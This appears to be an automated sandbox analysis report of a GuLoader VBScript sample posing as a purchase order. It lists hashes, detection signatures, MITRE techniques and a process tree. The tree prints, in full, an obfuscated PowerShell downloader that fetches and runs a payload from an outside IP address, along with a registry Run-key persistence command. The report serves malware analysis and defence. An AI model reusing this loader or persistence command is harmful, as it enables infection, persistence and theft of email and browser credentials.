guloader | 7b8c7f79dd1cacee11235d172658839d6435acdb8d1a6043d48abc10e2aec3fb

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
02-05-2024 14:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

REVISED NEW ORDER 7936-2024.vbs
Size

42KB
MD5

7c07b76a5587795f4b9a2e8c129f656d
SHA1

9296b93c2fc2222407146bda21603d454c339c73
SHA256

720d5e29e7249eea52bd04ba585b9e18908356bbc3cea37920f44b1673ca9ef6
SHA512

75a0a76389b6d852c063b33858514348f2d5de1943d5c44db10e67c978a8b554ac0948664ed876f7a0328fefeb5d4a2cbd50bfdbbab05544889327071456c684
SSDEEP

768:T5jl4SycO0mAWbs1SDsqc59+yh9UzzsvhrffpVrLPX371iwBA08ltHF:T5j+NcOZAWbs1SgR59ZVhrffpVPg08vF

Score

10^/10

guloader collection downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral4/memory/4540-63-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral4/memory/3800-64-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 3 IoCs

resource	yara_rule
behavioral4/memory/4540-63-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral4/memory/3800-64-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral4/memory/1596-62-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	1384	WScript.exe
19	2448	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	wab.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nuchale = "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\\Sortiment\\').Anadems;%Piptadenia% ($Negerens127)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
4232	wab.exe
4232	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
112	powershell.exe
4232	wab.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 112 set thread context of 4232	112	powershell.exe	104
PID 4232 set thread context of 3800	4232	wab.exe	108
PID 4232 set thread context of 4540	4232	wab.exe	109
PID 4232 set thread context of 1596	4232	wab.exe	110

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3796	reg.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2448	powershell.exe
2448	powershell.exe
112	powershell.exe
112	powershell.exe
112	powershell.exe
112	powershell.exe
1596	wab.exe
1596	wab.exe
3800	wab.exe
3800	wab.exe
3800	wab.exe
3800	wab.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
112	powershell.exe
4232	wab.exe
4232	wab.exe
4232	wab.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2448	powershell.exe
Token: SeDebugPrivilege	112	powershell.exe
Token: SeDebugPrivilege	1596	wab.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4232	wab.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 1384 wrote to memory of 2448	1384	WScript.exe	90
PID 1384 wrote to memory of 2448	1384	WScript.exe	90
PID 2448 wrote to memory of 1624	2448	powershell.exe	94
PID 2448 wrote to memory of 1624	2448	powershell.exe	94
PID 2448 wrote to memory of 112	2448	powershell.exe	98
PID 2448 wrote to memory of 112	2448	powershell.exe	98
PID 2448 wrote to memory of 112	2448	powershell.exe	98
PID 112 wrote to memory of 2344	112	powershell.exe	102
PID 112 wrote to memory of 2344	112	powershell.exe	102
PID 112 wrote to memory of 2344	112	powershell.exe	102
PID 112 wrote to memory of 4232	112	powershell.exe	104
PID 112 wrote to memory of 4232	112	powershell.exe	104
PID 112 wrote to memory of 4232	112	powershell.exe	104
PID 112 wrote to memory of 4232	112	powershell.exe	104
PID 112 wrote to memory of 4232	112	powershell.exe	104
PID 4232 wrote to memory of 1696	4232	wab.exe	105
PID 4232 wrote to memory of 1696	4232	wab.exe	105
PID 4232 wrote to memory of 1696	4232	wab.exe	105
PID 1696 wrote to memory of 3796	1696	cmd.exe	107
PID 1696 wrote to memory of 3796	1696	cmd.exe	107
PID 1696 wrote to memory of 3796	1696	cmd.exe	107
PID 4232 wrote to memory of 3800	4232	wab.exe	108
PID 4232 wrote to memory of 3800	4232	wab.exe	108
PID 4232 wrote to memory of 3800	4232	wab.exe	108
PID 4232 wrote to memory of 3800	4232	wab.exe	108
PID 4232 wrote to memory of 4540	4232	wab.exe	109
PID 4232 wrote to memory of 4540	4232	wab.exe	109
PID 4232 wrote to memory of 4540	4232	wab.exe	109
PID 4232 wrote to memory of 4540	4232	wab.exe	109
PID 4232 wrote to memory of 1596	4232	wab.exe	110
PID 4232 wrote to memory of 1596	4232	wab.exe	110
PID 4232 wrote to memory of 1596	4232	wab.exe	110
PID 4232 wrote to memory of 1596	4232	wab.exe	110

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\REVISED NEW ORDER 7936-2024.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvemRestpldStartk Borem./Exo ercAuturg reoler$slith,NCuadrioRugos,nTro.fleRib,onn GorsyvSat niiIntercoLsninguN klassUnbonn) Guin ');Ordonnant (Andelskapitals 'Bo,uso$ Flertg Ost alEksprooTonginb frankaWastlalSpartl:Re.dysBHookeri Progrm YashmiF avrilAfb,ndlCed,ellBas eteSengetnPar lenmand,aiAlvor.aKonver=Fl,wer$Persect O flyaAvisndmIdeanfa Domi,rTjenliiInsemi.ElektrsBy.gelpEnhv.rlRice ii BlodptAndroc( Pumic$ onoloUUn,scunFilteshJasperePate tsDelfitiJo,suntIndtegaAartietS.viori,pladevStartee DrudflHeapsoyG,tevr) Coa,n ');$tamari=$Bimilllennia[0];Ordonnant (Andelskapitals 'Solsik$Srgemag RaphalS gregoAgathibSol.ysaMatronlE broi: MisddA.evareuNonagerAls,diisyst mgNe.fourGela,iaLag inp Bulmeh kom,oyWhitel1.onoch6Me,rif8Civi i=.aacreNGlo,mieSub,arw B.spn-Zeal,dO R prib Kodifj UinaleAd ptec AgermtLedni, Haplo.S curmuyPre.stsSuperatVoldtaePe nagmAlogot.SharewNE emeneFestontKlapsa.UncameW Ngst,eSa.hedbD rgekCExorcilGener,i n wsleB.rricnOppebrtSp ndy ');Ordonnant (Andelskapitals 'Wistar$AnaeroA,ternouVandsprProaliiKuliltgBib iorAccumuaMaksimpLemu eh IntelySydame1Pec,or6Saddel8Reetab. FortsHCircumeTrin.ta icherdPicotieNonprorS epdasFuttoc[ Brand$V,dehaSTa.ientEksploadeklarsPindsve V,deor Bothl1Bygden1Pdofil2 ,osen].onero=Antine$ TirsdNSuffaroRulleknNedkomlForarmoUncircvStsydseSkurkerTryp,n ');$Conjuncts=Andelskapitals 'Dep avA tageuVrtdyrrStraffiManudug Fishbr limmeaVlessap St,rehVerdeny Unorm1Ablati6 Ur,ni8Uds ag.WopsboD UrbanoCerat,wEnshean BenzilMi.dstoGalilaaAdmiradPi.kawFFragmei.orstalSt,muleHooke.(Hydato$Cataget.verdnaPolyanmPre.iaatj.nebrPersoniGlobus,Hir in$s.ildpSBerappp radioaPornognudtrksiRhymero Stropl.ightsaDecentt.plevceRockla)Om.ind ';$Conjuncts=$baaskap[1]+$Conjuncts;$Spaniolate=$baaskap[0];Ordonnant (Andelskapitals 'Spi,el$Afbring Hy,anlBilligo,rejerb sliskaF.gsellAlloyt:OdilesHKulturaMa blyeFiskesmForedeoIntercrStoraarLets nh MandsaPhlebog I cini.opeienDu chygLoused= Colla(Form sTSkadegeV rslasAk,arit Humer- ManifPWallflaChondrtHadronh heter Untott$Parag SSymmetpraveliaC oplan Tilv,iHudgenoAnalg.l .anglaVaretat.useumeUncoor),nkelt ');while (!$Haemorrhaging) {Ordonnant (Andelskapitals 'Bundsn$FilologEnthral Strepo SpectbPannela SpeedlMat,ic: naffFRed,utoha.delr GenopeGrotonsrecondtLsessoi Soranl Demo l.onirriF,udernSyzygegTrstegsBugserkMaskinr Fras,e NoncodLnforssAnti he FamilnSy temeSp ndi= ,rawf$SkrmentForretrShellfu cullieLkkest ') ;Ordonnant $Conjuncts;Ordonnant (Andelskapitals ' friedSadidastA,stema .fblnrForslat Chelo- arbejSU,toadlVrdipaeDupliceSommerpTel.sk Vomere4Cit am ');Ordonnant (Andelskapitals 'Myelof$LogogrgVarliglAr ustoManropbKo,turaShinbol,orhip: LustiHBagslaaElbenmeunvitrmSploshoDil.ymrBemo lrUmaadehGesundaBa tergCathodiSmagstnL.banegBomben=Tvindc(St uthTHaa.cyeRecagis itemit Unsen-SwotteP AbdiaaSvibletFdeegnhgoloch Seders$Sande,SForsigp xpiraKhubbenS.rmeriRomanioHed.ril Oply,aTragedtunconteArgent)Beskyt ') ;Ordonnant (Andelskapitals ' omito$ S,ndegBudgetl Afk.ioBlkhatbG,yconaFlaekhl Nonm :Af.pndC Gremlhpostpalpoodeco metapr Udfr oElkomfhPackmay NaaeddBushelrL mineotermokc bernia megalrClimanbVel.rdo,ysternNemmen=microg$ ,ymphgUgrliglTwitcho.ichenbRes,rpa,ilslulStigm.:Ko torFFremhva Bri.lgDignifkVrd hfrUdmatriS akestNeophiiJouncek hemitkRash uevaabennHk,ene+Eutect+ nterd%Schill$JagheeBOmstniiPr,ikemOmgangiDepotelUpholsl Ballal OverdeHunknsn Pr.tonKlemteiHomoe.aGardeh.Patronc ElectoUnallouHepatanAlbe tt Br.dn ') ;$tamari=$Bimilllennia[$Chlorohydrocarbon];}Ordonnant (Andelskapitals 'Headsa$Kreditg VerdslLe.urioModifibOrthodaAloer.lOphold:MagicsUReprsepretsbesAvicull.edroniEvolvepSllesc Titan= Helin ,nepigGBagkldeBalsamtPerime- PyrarCDiagonoNoctamnPreetet ,ruseeTermosnS.hooltU dema Nordba$DendraS.otogrpof,iceaVaabe.necclesi BystaoEgnsp.lSelleraNonblit,lumuleBasset ');Ordonnant (Andelskapitals 'Phyllo$Ung,arg,fterblBowpotoRumfa b,ivildaMisbeslO erfi:MiseraHOzonedaIsengalEllevtaAlum.rlSavagiaNoniroh Fyrvrs Verge1Sheath4R,gnsk0Attrap Car,i= Lieno Stemme[ AcathSkarr eyMyop rs GratutUnmodieCoercimMorbro.ViksecCC,ddieoSeeweenCopyfiv ReduceOverthr Enight Vejov]Epi rh:Kaff,f:BawbeeFBountirOpsigeoSalvagmkvindeBUretfraSkbnegsOverkneReserv6 F.str4 C aneSTrsklet Flyg.rIndtryi.irginn Lor.cg Trnin(Foreta$ vertrUVansk p Jrnags Unco,l HaylaiConnubpaficio)underk ');Ordonnant (Andelskapitals ' Ug ns$ ChurlgBokserl Unoffo SubstbHarmonaSlavislNrings:Quint,KNeu,roaDigterrBefuldo Termi C,thin=Unlika Be mut[RacemoSBrusenyApokres Un.ertFordabeInterfmUnderk.NondamTMenueteFyrretxMolysbtCanich.SalonmEComplonHovedecZarniwoTransmdBezoariHomeotnEmpha,gSociol]In.ers: Avidi:LatineABlendeSTa,dhjCf tostI,olotoISm.ena.OplageGPolitieUnn tutpuristSPottietDramatrEpidemiTri.esn F,diggCurtes(.iguli$EnhaunHTildr aCyane,lJ,mfrua ,npaylSir psaDefensh LagersB.otek1 Nonre4Smitt.0Ic fal)Tilbud ');Ordonnant (Andelskapitals ' kivie$For,acgPegliklEnvoyeoDaaseab Skriga.odkanl Letfr:Jord,tESammmeuO,ersar ,ejreyBr.geraD likal No.tae inderaforhi.eForl g=Servic$cult.aK M.dulaStblokrReportoZonete.abattis RechauKi,dembH.percsLac imtschreirUnameniCyst,cnDorsivgo clus( Feltb3afs.ib2Oceano5Be,how8Catato0Dovens7Sympto, Knepp2Celleo9Pipist1Goersw2,ibbon0U.iver) ,oate ');Ordonnant $Euryaleae;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2448
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $"
    3⤵
    PID:1624
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvemRestpldStartk Borem./Exo ercAuturg reoler$slith,NCuadrioRugos,nTro.fleRib,onn GorsyvSat niiIntercoLsninguN klassUnbonn) Guin ');Ordonnant (Andelskapitals 'Bo,uso$ Flertg Ost alEksprooTonginb frankaWastlalSpartl:Re.dysBHookeri Progrm YashmiF avrilAfb,ndlCed,ellBas eteSengetnPar lenmand,aiAlvor.aKonver=Fl,wer$Persect O flyaAvisndmIdeanfa Domi,rTjenliiInsemi.ElektrsBy.gelpEnhv.rlRice ii BlodptAndroc( Pumic$ onoloUUn,scunFilteshJasperePate tsDelfitiJo,suntIndtegaAartietS.viori,pladevStartee DrudflHeapsoyG,tevr) Coa,n ');$tamari=$Bimilllennia[0];Ordonnant (Andelskapitals 'Solsik$Srgemag RaphalS gregoAgathibSol.ysaMatronlE broi: MisddA.evareuNonagerAls,diisyst mgNe.fourGela,iaLag inp Bulmeh kom,oyWhitel1.onoch6Me,rif8Civi i=.aacreNGlo,mieSub,arw B.spn-Zeal,dO R prib Kodifj UinaleAd ptec AgermtLedni, Haplo.S curmuyPre.stsSuperatVoldtaePe nagmAlogot.SharewNE emeneFestontKlapsa.UncameW Ngst,eSa.hedbD rgekCExorcilGener,i n wsleB.rricnOppebrtSp ndy ');Ordonnant (Andelskapitals 'Wistar$AnaeroA,ternouVandsprProaliiKuliltgBib iorAccumuaMaksimpLemu eh IntelySydame1Pec,or6Saddel8Reetab. FortsHCircumeTrin.ta icherdPicotieNonprorS epdasFuttoc[ Brand$V,dehaSTa.ientEksploadeklarsPindsve V,deor Bothl1Bygden1Pdofil2 ,osen].onero=Antine$ TirsdNSuffaroRulleknNedkomlForarmoUncircvStsydseSkurkerTryp,n ');$Conjuncts=Andelskapitals 'Dep avA tageuVrtdyrrStraffiManudug Fishbr limmeaVlessap St,rehVerdeny Unorm1Ablati6 Ur,ni8Uds ag.WopsboD UrbanoCerat,wEnshean BenzilMi.dstoGalilaaAdmiradPi.kawFFragmei.orstalSt,muleHooke.(Hydato$Cataget.verdnaPolyanmPre.iaatj.nebrPersoniGlobus,Hir in$s.ildpSBerappp radioaPornognudtrksiRhymero Stropl.ightsaDecentt.plevceRockla)Om.ind ';$Conjuncts=$baaskap[1]+$Conjuncts;$Spaniolate=$baaskap[0];Ordonnant (Andelskapitals 'Spi,el$Afbring Hy,anlBilligo,rejerb sliskaF.gsellAlloyt:OdilesHKulturaMa blyeFiskesmForedeoIntercrStoraarLets nh MandsaPhlebog I cini.opeienDu chygLoused= Colla(Form sTSkadegeV rslasAk,arit Humer- ManifPWallflaChondrtHadronh heter Untott$Parag SSymmetpraveliaC oplan Tilv,iHudgenoAnalg.l .anglaVaretat.useumeUncoor),nkelt ');while (!$Haemorrhaging) {Ordonnant (Andelskapitals 'Bundsn$FilologEnthral Strepo SpectbPannela SpeedlMat,ic: naffFRed,utoha.delr GenopeGrotonsrecondtLsessoi Soranl Demo l.onirriF,udernSyzygegTrstegsBugserkMaskinr Fras,e NoncodLnforssAnti he FamilnSy temeSp ndi= ,rawf$SkrmentForretrShellfu cullieLkkest ') ;Ordonnant $Conjuncts;Ordonnant (Andelskapitals ' friedSadidastA,stema .fblnrForslat Chelo- arbejSU,toadlVrdipaeDupliceSommerpTel.sk Vomere4Cit am ');Ordonnant (Andelskapitals 'Myelof$LogogrgVarliglAr ustoManropbKo,turaShinbol,orhip: LustiHBagslaaElbenmeunvitrmSploshoDil.ymrBemo lrUmaadehGesundaBa tergCathodiSmagstnL.banegBomben=Tvindc(St uthTHaa.cyeRecagis itemit Unsen-SwotteP AbdiaaSvibletFdeegnhgoloch Seders$Sande,SForsigp xpiraKhubbenS.rmeriRomanioHed.ril Oply,aTragedtunconteArgent)Beskyt ') ;Ordonnant (Andelskapitals ' omito$ S,ndegBudgetl Afk.ioBlkhatbG,yconaFlaekhl Nonm :Af.pndC Gremlhpostpalpoodeco metapr Udfr oElkomfhPackmay NaaeddBushelrL mineotermokc bernia megalrClimanbVel.rdo,ysternNemmen=microg$ ,ymphgUgrliglTwitcho.ichenbRes,rpa,ilslulStigm.:Ko torFFremhva Bri.lgDignifkVrd hfrUdmatriS akestNeophiiJouncek hemitkRash uevaabennHk,ene+Eutect+ nterd%Schill$JagheeBOmstniiPr,ikemOmgangiDepotelUpholsl Ballal OverdeHunknsn Pr.tonKlemteiHomoe.aGardeh.Patronc ElectoUnallouHepatanAlbe tt Br.dn ') ;$tamari=$Bimilllennia[$Chlorohydrocarbon];}Ordonnant (Andelskapitals 'Headsa$Kreditg VerdslLe.urioModifibOrthodaAloer.lOphold:MagicsUReprsepretsbesAvicull.edroniEvolvepSllesc Titan= Helin ,nepigGBagkldeBalsamtPerime- PyrarCDiagonoNoctamnPreetet ,ruseeTermosnS.hooltU dema Nordba$DendraS.otogrpof,iceaVaabe.necclesi BystaoEgnsp.lSelleraNonblit,lumuleBasset ');Ordonnant (Andelskapitals 'Phyllo$Ung,arg,fterblBowpotoRumfa b,ivildaMisbeslO erfi:MiseraHOzonedaIsengalEllevtaAlum.rlSavagiaNoniroh Fyrvrs Verge1Sheath4R,gnsk0Attrap Car,i= Lieno Stemme[ AcathSkarr eyMyop rs GratutUnmodieCoercimMorbro.ViksecCC,ddieoSeeweenCopyfiv ReduceOverthr Enight Vejov]Epi rh:Kaff,f:BawbeeFBountirOpsigeoSalvagmkvindeBUretfraSkbnegsOverkneReserv6 F.str4 C aneSTrsklet Flyg.rIndtryi.irginn Lor.cg Trnin(Foreta$ vertrUVansk p Jrnags Unco,l HaylaiConnubpaficio)underk ');Ordonnant (Andelskapitals ' Ug ns$ ChurlgBokserl Unoffo SubstbHarmonaSlavislNrings:Quint,KNeu,roaDigterrBefuldo Termi C,thin=Unlika Be mut[RacemoSBrusenyApokres Un.ertFordabeInterfmUnderk.NondamTMenueteFyrretxMolysbtCanich.SalonmEComplonHovedecZarniwoTransmdBezoariHomeotnEmpha,gSociol]In.ers: Avidi:LatineABlendeSTa,dhjCf tostI,olotoISm.ena.OplageGPolitieUnn tutpuristSPottietDramatrEpidemiTri.esn F,diggCurtes(.iguli$EnhaunHTildr aCyane,lJ,mfrua ,npaylSir psaDefensh LagersB.otek1 Nonre4Smitt.0Ic fal)Tilbud ');Ordonnant (Andelskapitals ' kivie$For,acgPegliklEnvoyeoDaaseab Skriga.odkanl Letfr:Jord,tESammmeuO,ersar ,ejreyBr.geraD likal No.tae inderaforhi.eForl g=Servic$cult.aK M.dulaStblokrReportoZonete.abattis RechauKi,dembH.percsLac imtschreirUnameniCyst,cnDorsivgo clus( Feltb3afs.ib2Oceano5Be,how8Catato0Dovens7Sympto, Knepp2Celleo9Pipist1Goersw2,ibbon0U.iver) ,oate ');Ordonnant $Euryaleae;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:112
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $"
      4⤵
      PID:2344
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4232
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1696
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:3796
    - - C:\Program Files (x86)\windows mail\wab.exe
        
